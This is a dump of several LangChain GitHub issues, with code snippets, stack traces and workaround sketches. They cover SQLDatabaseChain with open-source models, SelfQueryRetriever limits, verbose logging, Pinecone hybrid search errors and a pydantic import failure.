**_value is not a valid dict (type=type_error.dict)_**
```
Are there any samples/snippets available for using open-source LLM models in SQL Chain?
Sample code snippet I tried that is throwing the error:
```
tokenizer = TapexTokenizer.from_pretrained("microsoft/tapex-base-finetuned-wtq")
model = BartForConditionalGeneration.from_pretrained("microsoft/tapex-base-finetuned-wtq")
chain = SQLDatabaseChain(llm=model, database=db, verbose=True)
chain.run("context query ?")
```
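For reference, the validation error happens because `SQLDatabaseChain` expects a LangChain LLM wrapper, not a raw `transformers` model. A sketch of wrapping an open-source model (assuming a text-to-text model such as Flan-T5 — TAPEX's table-QA tokenizer doesn't fit a plain text pipeline — and reusing the `db` object from the snippet above):

```python
from transformers import pipeline
from langchain import SQLDatabaseChain  # moved to langchain_experimental in later versions
from langchain.llms import HuggingFacePipeline

pipe = pipeline(
    "text2text-generation",
    model="google/flan-t5-base",
    tokenizer="google/flan-t5-base",
    max_new_tokens=256,
)
llm = HuggingFacePipeline(pipeline=pipe)  # LangChain-compatible LLM wrapper

chain = SQLDatabaseChain.from_llm(llm=llm, db=db, verbose=True)
chain.run("context query ?")
```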
### Suggestion:
_No response_ | Using Open source LLM models in SQL Chain | https://api.github.com/repos/langchain-ai/langchain/issues/7528/comments | 8 | 2023-07-11T10:59:28Z | 2024-02-23T16:08:17Z | https://github.com/langchain-ai/langchain/issues/7528 | 1,798,675,621 | 7,528 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I tested with enable_limit set to True, asking things like:
1. Get 3 residents who were born in xxx
2. Get 5 residents who were born in xxx
It works pretty well.
However, in my use case users can also ask: "List all the residents who were born in xxx."
For questions like this, by default it returns only 4 documents, not all of them.

### Motivation
My use case sometimes requires listing all documents that match the criteria, not only 4.
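A partial workaround sketch (my assumption): `SelfQueryRetriever` accepts `search_kwargs`, so raising `k` lifts the default cap of 4 when no explicit limit is parsed from the query:

```python
retriever = SelfQueryRetriever.from_llm(
    llm,
    vectorstore,
    document_content_description,
    metadata_field_info,
    enable_limit=True,
    search_kwargs={"k": 100},  # hypothetical upper bound; the default is 4
)
```

This is still a fixed ceiling, though — a real "return all matches" option would need support in the retriever itself.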
### Your contribution
I am a beginner in langchain (only used it for 2 months), so not sure where in the code this can be fixed, but with the proper guidance I should be able to contribute (if somebody is willing to guide me) | SelfQueryRetriever, Add option to return all when user asks | https://api.github.com/repos/langchain-ai/langchain/issues/7527/comments | 3 | 2023-07-11T10:21:55Z | 2023-11-20T16:06:02Z | https://github.com/langchain-ai/langchain/issues/7527 | 1,798,612,838 | 7,527 |
[
"hwchase17",
"langchain"
]
| ### System Info
python==3.10
langchain==0.0.169
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
Steps to reproduce:
1. Open the [example notebook](https://colab.research.google.com/drive/1ut3LVSSxsN_C52Pn1ceqWdHjSzhxuZol?usp=sharing)
2. Replace ```insert API key here``` with your API key
3. Run all cells
### Expected behavior
Asynchronously calling the RetrievalQAWithSourcesChain with ```chain_type_kwargs = {"prompt": prompt, "verbose": True}``` should result in the same terminal output as the synchronous version instead of skipping "Prompt after formatting: ..."
```result = chain(query)``` output:
```
> Entering new StuffDocumentsChain chain...
> Entering new LLMChain chain...
Prompt after formatting:
PROMPT_AFTER_FORMATTING
> Finished chain.
> Finished chain.
```
Wrong ```result = await chain.acall(query)``` output:
```
> Entering new StuffDocumentsChain chain...
> Entering new LLMChain chain...
> Finished chain.
> Finished chain.
```
| RetrievalQAWithSourcesChain acall does not write fromatted prompt to terminal if verbose=True | https://api.github.com/repos/langchain-ai/langchain/issues/7526/comments | 3 | 2023-07-11T09:22:43Z | 2023-07-11T11:21:36Z | https://github.com/langchain-ai/langchain/issues/7526 | 1,798,503,336 | 7,526 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain v0.0.229, Python v3.10.12, Ubuntu 20.04.2 LTS
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
I am encountering an issue where the specific name of the current chain is not being displayed in the console output, even though I have set 'verbose=True' in the MultiPromptChain and other Chains. When the program enters a new chain, it only prints 'Entering new chain...' without specifying the name of the chain. This makes it difficult to debug and understand which chain is currently being used. Could you please look into this issue and provide a way to display the name of the current chain in the console output? Thank you.
The current output looks like this:
```
> Entering new chain...
> Entering new chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
warnings.warn(
> Finished chain.
math: {'input': 'What is the derivative of a function?'}
> Entering new chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.
Here is a question:
What is the derivative of a function?
> Finished chain.
> Finished chain.
```
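In the meantime, a workaround sketch: a custom callback handler can recover each chain's class name from the serialized payload passed to `on_chain_start` (the `"id"` key is an assumption about the current serialization format; older versions used `"name"`):

```python
from typing import Any, Dict
from langchain.callbacks.base import BaseCallbackHandler

class ChainNameLogger(BaseCallbackHandler):
    def on_chain_start(
        self, serialized: Dict[str, Any], inputs: Dict[str, Any], **kwargs: Any
    ) -> None:
        # "id" is a module path like ["langchain", "chains", "llm", "LLMChain"]
        name = serialized.get("id", [serialized.get("name", "unknown")])[-1]
        print(f"\n> Entering new {name} chain...")

# `chain` and `question` stand in for your MultiPromptChain call
chain.run(question, callbacks=[ChainNameLogger()])
```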
### Expected behavior
```
> Entering new MultiPromptChain chain...
> Entering new LLMRouterChain chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
warnings.warn(
> Finished chain.
math: {'input': 'What is the derivative of a function?'}
> Entering new LLMChain[math] chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.
Here is a question:
What is the derivative of a function?
> Finished chain.
> Finished chain.
``` | Specific name of the current chain is not displayed | https://api.github.com/repos/langchain-ai/langchain/issues/7524/comments | 5 | 2023-07-11T08:28:40Z | 2023-07-14T00:14:47Z | https://github.com/langchain-ai/langchain/issues/7524 | 1,798,403,821 | 7,524 |
[
"hwchase17",
"langchain"
]
| ### System Info
0.0.228
### Who can help?
@lbsnrs
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Following tutorial here:
https://python.langchain.com/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search
```
bm25_encoder = BM25Encoder().default()
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
retriever = PineconeHybridSearchRetriever(
embeddings=embed, sparse_encoder=bm25_encoder, index="cubigometadatanotindexed"
)
retriever.add_texts(["foo", "bar", "FirstName0003384 is a guy", "FirstName0003381 is a girl"])
result = retriever.get_relevant_documents("Who is FirstName0003381?")
```
I get this error:
```
AttributeError: 'str' object has no attribute 'upsert'
Traceback:
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "C:\Users\xx\repos\xxChatbotv1\app\pages\Pinecone Hybrid Search.py", line 116, in <module>
main()
File "C:\Users\xx\repos\xxChatbotv1\app\pages\Pinecone Hybrid Search.py", line 112, in main
retriever.add_texts(["foo", "bar", "FirstName0003384 is a guy", "hello"])
File "C:\Users\xx\anaconda3\envs\zzChatbotv3\Lib\site-packages\langchain\retrievers\pinecone_hybrid_search.py", line 121, in add_texts
create_index(
File "C:\Users\xx\anaconda3\envs\zzChatbotv3\Lib\site-packages\langchain\retrievers\pinecone_hybrid_search.py", line 98, in create_index
index.upsert(vectors)
^^^^^^^^^^^^
```
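The likely cause (my assumption): `index` is being passed as a name string, while the retriever expects a `pinecone.Index` instance — the `create_index` helper in the traceback calls `.upsert()` on it directly. A sketch of the fix:

```python
import pinecone

pinecone.init(api_key="...", environment="...")
index = pinecone.Index("cubigometadatanotindexed")  # an Index object, not a name string

retriever = PineconeHybridSearchRetriever(
    embeddings=embed, sparse_encoder=bm25_encoder, index=index
)
```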
### Expected behavior
The texts should be added to the index without error | AttributeError: 'str' object has no attribute 'upsert' in Pinecone Hybrid Search | https://api.github.com/repos/langchain-ai/langchain/issues/7523/comments | 3 | 2023-07-11T08:19:47Z | 2023-10-18T16:06:03Z | https://github.com/langchain-ai/langchain/issues/7523 | 1,798,387,965 | 7,523 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
```
Traceback (most recent call last):
File "D:\EmbeddingsSearch\llm-python\02b_llama_chroma.py", line 2, in <module>
from llama_index import SimpleDirectoryReader, StorageContext, GPTVectorStoreIndex
File "F:\Anaconda\lib\site-packages\llama_index\__init__.py", line 15, in <module>
from llama_index.embeddings.langchain import LangchainEmbedding
File "F:\Anaconda\lib\site-packages\llama_index\embeddings\__init__.py", line 4, in <module>
from llama_index.embeddings.langchain import LangchainEmbedding
File "F:\Anaconda\lib\site-packages\llama_index\embeddings\langchain.py", line 6, in <module>
from langchain.embeddings.base import Embeddings as LCEmbeddings
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\agents\__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\agents\agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\agents\tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\tools\__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\tools\arxiv\tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\utilities\__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\utilities\apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\document_loaders\__init__.py", line 44, in <module>
from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\document_loaders\embaas.py", line 54, in <module>
class BaseEmbaasLoader(BaseModel):
File "pydantic\main.py", line 204, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 488, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 419, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 539, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 801, in pydantic.fields.ModelField.populate_validators
File "pydantic\validators.py", line 696, in find_validators
File "pydantic\validators.py", line 585, in pydantic.validators.make_typeddict_validator
File "pydantic\annotated_types.py", line 35, in pydantic.annotated_types.create_model_from_typeddict
File "pydantic\main.py", line 972, in pydantic.main.create_model
File "pydantic\main.py", line 204, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 488, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 419, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 534, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 638, in pydantic.fields.ModelField._type_analysis
File "F:\Anaconda\lib\typing.py", line 1158, in __subclasscheck__
return issubclass(cls, self.__origin__)
TypeError: issubclass() arg 1 must be a class
Process finished with exit code 1
```
### Suggestion:
_No response_ | TypeError: issubclass() arg 1 must be a class | https://api.github.com/repos/langchain-ai/langchain/issues/7522/comments | 22 | 2023-07-11T07:59:09Z | 2024-04-30T09:28:55Z | https://github.com/langchain-ai/langchain/issues/7522 | 1,798,351,804 | 7,522 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search
### Idea or request for content:
It's not clear on this page how to index data in Pinecone for hybrid search — the sparse values and the BM25 encoder are the confusing part. (My current dense-only indexing, which works, is shown after the sketch below.)
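For the sparse side, a minimal sketch of what I believe the hybrid flow should look like, based on the retriever's docs (the fit-on-corpus step and the index name are assumptions; `BM25Encoder().default()` would use pretrained MS MARCO parameters instead):

```python
import pinecone
from pinecone_text.sparse import BM25Encoder
from langchain.retrievers import PineconeHybridSearchRetriever

pinecone.init(api_key="...", environment="...")
index = pinecone.Index("cubigo")  # hybrid search needs a dotproduct-metric index

corpus = df["content"].tolist()

bm25_encoder = BM25Encoder()
bm25_encoder.fit(corpus)               # fit the sparse encoder on your own corpus
bm25_encoder.dump("bm25_values.json")  # optional: persist, reload with .load()

retriever = PineconeHybridSearchRetriever(
    embeddings=embed, sparse_encoder=bm25_encoder, index=index
)
retriever.add_texts(corpus)            # upserts dense + sparse vectors together
```

My current dense-only indexing code, for reference: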
```
df = loadSqlData()
df.to_csv('profiles.csv', index=False)
# Iterate through DataFrame rows
# Time Complexity: O(n), where n is the number of rows in the DataFrame
for _, record in df.iterrows():
start_time = time.time()
# Get metadata for this record
# Time Complexity: O(1)
metadata = {
'IdentityId': str(record['IdentityId'])
}
st.write(f'Time taken for metadata extraction: {time.time() - start_time} seconds')
start_time = time.time()
# Split record text into chunks
# Time Complexity: O(m), where m is the size of the text
record_texts = text_splitter.split_text(record['content'])
st.write(f'Time taken for text splitting: {time.time() - start_time} seconds')
start_time = time.time()
# Create metadata for each chunk
# Time Complexity: O(k), where k is the number of chunks in the text
record_metadatas = [{
"chunk": j, "text": text, **metadata
} for j, text in enumerate(record_texts)]
st.write(f'Time taken for metadata dictionary creation: {time.time() - start_time} seconds')
start_time = time.time()
# Append chunks and metadata to current batches
# Time Complexity: O(1)
texts.extend(record_texts)
metadatas.extend(record_metadatas)
st.write(f'Time taken for data appending: {time.time() - start_time} seconds')
# If batch_limit is reached, upsert vectors
# Time Complexity: Depends on the upsert implementation
if len(texts) >= batch_limit:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="xx",
metadatas=metadatas,
namespace="vwProfiles2")
texts = []
metadatas = []
st.write(f'Time taken for vector upsertion (simulated): {time.time() - start_time} seconds')
# Upsert any remaining vectors after the loop
# Time Complexity: Depends on the upsert implementation
if len(texts) > 0:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="x",
metadatas=metadatas,
namespace="vwProfiles2")
st.write(f'Time taken for remaining vector upsertion (simulated): {time.time() - start_time} seconds')
st.write('Rows indexed: ', len(df))
``` | Hybrid search indexing how to | https://api.github.com/repos/langchain-ai/langchain/issues/7519/comments | 3 | 2023-07-11T06:48:37Z | 2023-10-28T16:05:35Z | https://github.com/langchain-ai/langchain/issues/7519 | 1,798,231,461 | 7,519 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.228
python 3.11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have a pinecone index with information which I upserted from a SQL table like this:
```
df = loadSqlData()
df.to_csv('profiles.csv', index=False)
# Iterate through DataFrame rows
# Time Complexity: O(n), where n is the number of rows in the DataFrame
for _, record in df.iterrows():
start_time = time.time()
# Get metadata for this record
# Time Complexity: O(1)
metadata = {
'IdentityId': str(record['IdentityId'])
}
st.write(f'Time taken for metadata extraction: {time.time() - start_time} seconds')
start_time = time.time()
# Split record text into chunks
# Time Complexity: O(m), where m is the size of the text
record_texts = text_splitter.split_text(record['content'])
st.write(f'Time taken for text splitting: {time.time() - start_time} seconds')
start_time = time.time()
# Create metadata for each chunk
# Time Complexity: O(k), where k is the number of chunks in the text
record_metadatas = [{
"chunk": j, "text": text, **metadata
} for j, text in enumerate(record_texts)]
st.write(f'Time taken for metadata dictionary creation: {time.time() - start_time} seconds')
start_time = time.time()
# Append chunks and metadata to current batches
# Time Complexity: O(1)
texts.extend(record_texts)
metadatas.extend(record_metadatas)
st.write(f'Time taken for data appending: {time.time() - start_time} seconds')
# If batch_limit is reached, upsert vectors
# Time Complexity: Depends on the upsert implementation
if len(texts) >= batch_limit:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="cubigo",
metadatas=metadatas,
namespace="vwProfiles2")
texts = []
metadatas = []
st.write(f'Time taken for vector upsertion (simulated): {time.time() - start_time} seconds')
# Upsert any remaining vectors after the loop
# Time Complexity: Depends on the upsert implementation
if len(texts) > 0:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="cubigo",
metadatas=metadatas,
namespace="vwProfiles2")
st.write(f'Time taken for remaining vector upsertion (simulated): {time.time() - start_time} seconds')
st.write('Rows indexed: ', len(df))
```
Now I am trying to make a chatbot over my SQL table. I don't want to use the SQLToolkit or an agent, as they are very slow,
so I am trying to use the following code:
```
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
user_input = get_text()
vectorstore = Pinecone.from_existing_index("cubigo",embedding=embed, namespace="vwProfiles2")
docs =vectorstore.similarity_search_with_score(user_input, k=250, namespace="vwProfiles2") #Who is from Bransk
vectordb = Pinecone.from_documents(documents=docs,
embedding=embed)
qa = RetrievalQA.from_chain_type(llm=llm,
chain_type="stuff",
retriever=vectordb.as_retriever()
)
response = qa.run(user_input)
```
But I get this error
AttributeError: 'tuple' object has no attribute 'page_content'
```
File "C:\Users\xx\repos\xxChatbotv1\app\pages\07Chat With Pinecone Directly.py", line 100, in main
vectordb = Pinecone.ncia\repos\xxChatbotv1\app\pages\07Chat With Pinecone Directly.py", line 100, in main
vectordb = Pinecone.from_documents(documents=docs,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in from_documents
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in <listcomp>
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^from_documents(documents=docs,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in from_documents
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in <listcomp>
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^
```
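The tuples come from `similarity_search_with_score`, which returns `(Document, score)` pairs rather than `Document`s, so `Pinecone.from_documents` fails on them. There is also no need to rebuild a vectorstore from the search results — a sketch of a simpler wiring (my assumption about the intent):

```python
vectorstore = Pinecone.from_existing_index(
    "cubigo", embedding=embed, namespace="vwProfiles2"
)
qa = RetrievalQA.from_chain_type(
    llm=llm,
    chain_type="stuff",
    retriever=vectorstore.as_retriever(search_kwargs={"k": 250}),
)
response = qa.run(user_input)
```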
### Expected behavior
response in plain english? | AttributeError: 'tuple' object has no attribute 'page_content' | https://api.github.com/repos/langchain-ai/langchain/issues/7518/comments | 4 | 2023-07-11T06:24:41Z | 2023-12-30T23:53:45Z | https://github.com/langchain-ai/langchain/issues/7518 | 1,798,199,037 | 7,518 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python 3.10.8
Langchain==0.0.229
AWS Sagemaker Studio w/ **PyTorch 2.0.0 Python 3.10 GPU Optimized** image
### Who can help?
@hwchase17 or @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
It was working fine in a Jupyter notebook in AWS SageMaker Studio for the past few weeks, but today I'm running into an issue with no code changes... an import chain issue?
```
!pip install langchain openai chromadb tiktoken pypdf unstructured pdf2image;

from langchain.document_loaders import TextLoader
```
Results in:
```
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[10], line 1
----> 1 from langchain.document_loaders import TextLoader
2 docLoader = TextLoader('./docs/nlitest.txt', encoding='utf8')
3 document = docLoader.load()
File /opt/conda/lib/python3.10/site-packages/langchain/__init__.py:6
3 from importlib import metadata
4 from typing import Optional
----> 6 from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
7 from langchain.cache import BaseCache
8 from langchain.chains import (
9 ConversationChain,
10 LLMBashChain,
(...)
18 VectorDBQAWithSourcesChain,
19 )
File /opt/conda/lib/python3.10/site-packages/langchain/agents/__init__.py:2
1 """Interface for agents."""
----> 2 from langchain.agents.agent import (
3 Agent,
4 AgentExecutor,
5 AgentOutputParser,
6 BaseMultiActionAgent,
7 BaseSingleActionAgent,
8 LLMSingleActionAgent,
9 )
10 from langchain.agents.agent_toolkits import (
11 create_csv_agent,
12 create_json_agent,
(...)
21 create_vectorstore_router_agent,
22 )
23 from langchain.agents.agent_types import AgentType
File /opt/conda/lib/python3.10/site-packages/langchain/agents/agent.py:25
17 from langchain.callbacks.base import BaseCallbackManager
18 from langchain.callbacks.manager import (
19 AsyncCallbackManagerForChainRun,
20 AsyncCallbackManagerForToolRun,
(...)
23 Callbacks,
24 )
---> 25 from langchain.chains.base import Chain
26 from langchain.chains.llm import LLMChain
27 from langchain.input import get_color_mapping
File /opt/conda/lib/python3.10/site-packages/langchain/chains/__init__.py:3
1 """Chains are easily reusable components which can be linked together."""
2 from langchain.chains.api.base import APIChain
----> 3 from langchain.chains.api.openapi.chain import OpenAPIEndpointChain
4 from langchain.chains.combine_documents.base import AnalyzeDocumentChain
5 from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain
File /opt/conda/lib/python3.10/site-packages/langchain/chains/api/openapi/chain.py:17
15 from langchain.requests import Requests
16 from langchain.schema.language_model import BaseLanguageModel
---> 17 from langchain.tools.openapi.utils.api_models import APIOperation
20 class _ParamMapping(NamedTuple):
21 """Mapping from parameter name to parameter value."""
File /opt/conda/lib/python3.10/site-packages/langchain/tools/__init__.py:11
4 from langchain.tools.azure_cognitive_services import (
5 AzureCogsFormRecognizerTool,
6 AzureCogsImageAnalysisTool,
7 AzureCogsSpeech2TextTool,
8 AzureCogsText2SpeechTool,
9 )
10 from langchain.tools.base import BaseTool, StructuredTool, Tool, tool
---> 11 from langchain.tools.bing_search.tool import BingSearchResults, BingSearchRun
12 from langchain.tools.brave_search.tool import BraveSearch
13 from langchain.tools.convert_to_openai import format_tool_to_openai_function
File /opt/conda/lib/python3.10/site-packages/langchain/tools/bing_search/__init__.py:3
1 """Bing Search API toolkit."""
----> 3 from langchain.tools.bing_search.tool import BingSearchResults, BingSearchRun
5 __all__ = ["BingSearchRun", "BingSearchResults"]
File /opt/conda/lib/python3.10/site-packages/langchain/tools/bing_search/tool.py:10
5 from langchain.callbacks.manager import (
6 AsyncCallbackManagerForToolRun,
7 CallbackManagerForToolRun,
8 )
9 from langchain.tools.base import BaseTool
---> 10 from langchain.utilities.bing_search import BingSearchAPIWrapper
13 class BingSearchRun(BaseTool):
14 """Tool that adds the capability to query the Bing search API."""
File /opt/conda/lib/python3.10/site-packages/langchain/utilities/__init__.py:3
1 """General utilities."""
2 from langchain.requests import TextRequestsWrapper
----> 3 from langchain.utilities.apify import ApifyWrapper
4 from langchain.utilities.arxiv import ArxivAPIWrapper
5 from langchain.utilities.awslambda import LambdaWrapper
File /opt/conda/lib/python3.10/site-packages/langchain/utilities/apify.py:5
1 from typing import Any, Callable, Dict, Optional
3 from pydantic import BaseModel, root_validator
----> 5 from langchain.document_loaders import ApifyDatasetLoader
6 from langchain.document_loaders.base import Document
7 from langchain.utils import get_from_dict_or_env
File /opt/conda/lib/python3.10/site-packages/langchain/document_loaders/__init__.py:44
39 from langchain.document_loaders.duckdb_loader import DuckDBLoader
40 from langchain.document_loaders.email import (
41 OutlookMessageLoader,
42 UnstructuredEmailLoader,
43 )
---> 44 from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
45 from langchain.document_loaders.epub import UnstructuredEPubLoader
46 from langchain.document_loaders.evernote import EverNoteLoader
File /opt/conda/lib/python3.10/site-packages/langchain/document_loaders/embaas.py:54
50 bytes: str
51 """The base64 encoded bytes of the document to extract text from."""
---> 54 class BaseEmbaasLoader(BaseModel):
55 """Base class for embedding a model into an Embaas document extraction API."""
57 embaas_api_key: Optional[str] = None
File /opt/conda/lib/python3.10/site-packages/pydantic/main.py:204, in pydantic.main.ModelMetaclass.__new__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:488, in pydantic.fields.ModelField.infer()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:419, in pydantic.fields.ModelField.__init__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:539, in pydantic.fields.ModelField.prepare()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:801, in pydantic.fields.ModelField.populate_validators()
File /opt/conda/lib/python3.10/site-packages/pydantic/validators.py:696, in find_validators()
File /opt/conda/lib/python3.10/site-packages/pydantic/validators.py:585, in pydantic.validators.make_typeddict_validator()
File /opt/conda/lib/python3.10/site-packages/pydantic/annotated_types.py:35, in pydantic.annotated_types.create_model_from_typeddict()
File /opt/conda/lib/python3.10/site-packages/pydantic/main.py:972, in pydantic.main.create_model()
File /opt/conda/lib/python3.10/site-packages/pydantic/main.py:204, in pydantic.main.ModelMetaclass.__new__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:488, in pydantic.fields.ModelField.infer()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:419, in pydantic.fields.ModelField.__init__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:534, in pydantic.fields.ModelField.prepare()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:638, in pydantic.fields.ModelField._type_analysis()
File /opt/conda/lib/python3.10/typing.py:1158, in _SpecialGenericAlias.__subclasscheck__(self, cls)
1156 return issubclass(cls.__origin__, self.__origin__)
1157 if not isinstance(cls, _GenericAlias):
-> 1158 return issubclass(cls, self.__origin__)
1159 return super().__subclasscheck__(cls)
TypeError: issubclass() arg 1 must be a class
```
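A commonly reported workaround for this exact `issubclass()` error (pydantic 1.x tripping over newer `typing-inspect`/`typing_extensions` releases) is pinning both packages — this is an assumption based on similar reports, not verified here:

```
!pip install typing-inspect==0.8.0 typing_extensions==4.5.0
```

Restart the kernel afterwards.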
### Expected behavior
The module should import with no error. | Langchain Import Issue | https://api.github.com/repos/langchain-ai/langchain/issues/7509/comments | 21 | 2023-07-11T01:12:10Z | 2024-07-13T00:38:14Z | https://github.com/langchain-ai/langchain/issues/7509 | 1,797,896,792 | 7,509 |
[
"hwchase17",
"langchain"
]
| ### System Info
I'm using langchain 0.0.218 with Python 3.10.0. When I pass a glob pattern as a direct argument while initializing the class, nothing is loaded, e.g. `DirectoryLoader(path=root_dir + 'data', glob="**/*.xml")`.
But when I pass it via `loader_kwargs` it works perfectly,
